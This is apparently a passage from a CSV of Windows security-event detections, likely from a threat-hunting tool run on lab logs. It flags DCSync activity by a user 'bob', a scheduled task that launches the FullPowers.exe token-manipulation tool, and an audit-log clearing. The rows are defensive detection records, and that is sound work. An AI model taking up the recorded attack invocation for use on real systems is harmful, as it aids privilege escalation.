1d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242591 + + + + + Security + DC1.insecurebank.local + + + + + A1AA38AA-447E-46C2-ABA0-D205D4D8F873 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242590 + + + + + Security + DC1.insecurebank.local + + + + + A1AA38AA-447E-46C2-ABA0-D205D4D8F873 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242589 + + + + + Security + DC1.insecurebank.local + + + + + 2EA9670C-F0F9-4D3F-90E5-A087E8C05863 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.022631,2019-03-26T01:28:45.022631+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242588 + + + + + Security + DC1.insecurebank.local + + + + + 2EA9670C-F0F9-4D3F-90E5-A087E8C05863 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +schedule task created,1583587059.98454,2020-03-07T17:17:39.984540+04:00,,Audit,High,schedule task created by user,4698," + + + + + 4698 + 0 + 0 + 12804 + 0 + 0x8020000000000000 + + + 282588 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + \FullPowersTask + <?xml version="1.0" encoding="UTF-16"?> +<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> + <RegistrationInfo> + <URI>\FullPowersTask</URI> + </RegistrationInfo> + <Triggers /> + <Principals> + <Principal id="Author"> + <UserId>S-1-5-19</UserId> + <RunLevel>LeastPrivilege</RunLevel> + <RequiredPrivileges> + <Privilege>SeAssignPrimaryTokenPrivilege</Privilege> + <Privilege>SeAuditPrivilege</Privilege> + <Privilege>SeChangeNotifyPrivilege</Privilege> + <Privilege>SeCreateGlobalPrivilege</Privilege> + <Privilege>SeImpersonatePrivilege</Privilege> + <Privilege>SeIncreaseQuotaPrivilege</Privilege> + <Privilege>SeIncreaseWorkingSetPrivilege</Privilege> + </RequiredPrivileges> + </Principal> + </Principals> + <Settings> + <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> + <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> + <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> + <AllowHardTerminate>true</AllowHardTerminate> + <StartWhenAvailable>false</StartWhenAvailable> + <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> + <IdleSettings> + <Duration>PT10M</Duration> + <WaitTimeout>PT1H</WaitTimeout> + <StopOnIdleEnd>true</StopOnIdleEnd> + <RestartOnIdle>false</RestartOnIdle> + </IdleSettings> + <AllowStartOnDemand>true</AllowStartOnDemand> + <Enabled>true</Enabled> + <Hidden>false</Hidden> + <RunOnlyIfIdle>false</RunOnlyIfIdle> + <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession> + <UseUnifiedSchedulingEngine>false</UseUnifiedSchedulingEngine> + <WakeToRun>false</WakeToRun> + <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> + <Priority>7</Priority> + </Settings> + <Actions Context="Author"> + <Exec> + <Command>C:\Users\Public\Tools\TokenManip\FullPowers.exe</Command> + <Arguments>-t 4932</Arguments> + </Exec> + </Actions> +</Task> + +",MSEDGEWIN10,Security +Audit log cleared,1651380018.084003,2022-05-01T08:40:18.084003+04:00,,Audit,Critical,Audit log cleared by user ( admin ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 21365 + + + + + Security + wind10.winlab.local + + + + + + S-1-5-21-482804190-775995292-3801157738-1002 + admin + WIND10 + 0x47ea55 + + +",wind10.winlab.local,Security +Audit log 